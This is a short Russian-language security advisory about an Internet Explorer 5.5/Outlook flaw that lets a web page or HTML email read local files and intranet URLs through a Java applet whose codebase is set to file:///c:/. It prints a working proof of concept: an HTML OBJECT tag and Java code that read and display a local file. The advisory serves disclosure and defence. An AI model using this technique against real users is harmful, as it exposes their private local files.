Детали:

В IE 5.5/Outlook/Outlook Express обнаружена уязвимость, позволяющая читать локальные файлы, произвольные интранет (это не опечатка 🙂 URL’ы и получать структуры локальных директорий после посещения определенной странички или чтения HTML-сообщения.

Причина очередного бага в мелкомягком софте — невозможность определить произвольный апплет, загруженный из <OBJECT> tag и jar-файла. Апплеты могут читать URL’ы из «код-базы» и связываться с хостами той же самой «код-базы».

Код устанавливает «код-базу» апплетов в file:///c:/. Проблема не в Java, и, возможно, не в Microsoft’s VM, скорее всего, проблема в том, как «код-база» устанавливается IE.

Exploit:

———javacodebase1.html——————————————
<OBJECT CLASSID=»JAVA:gjavacodebase.class» WIDTH=590>
<PARAM NAME=»ARCHIVE» VALUE=»http://www.guninski.com/gjavacodebase.jar»>
<PARAM NAME=»CODEBASE» VALUE=»file:///c:/»>
<PARAM NAME=»URL» VALUE=»file:///c:/test.txt»>
</OBJECT>
———————————————————————

———gjavacodebase.java——————————————-
……
  try
   {
      u = new URL(getParameter(«URL»));
      InputStream is=u.openStream();
      byte ba[]=new byte[1000];
      int l=is.read(ba);
      InputStream os=u.openConnection().getInputStream();
      String s1=new String(ba,0,l);

      print(u.toString());
      print(s1);
   }
…….
———————————————————————

Решение:
Отключите Java ;).

Демонстрация:
http://www.guninski.com/javacodebase1.html

Оставить мнение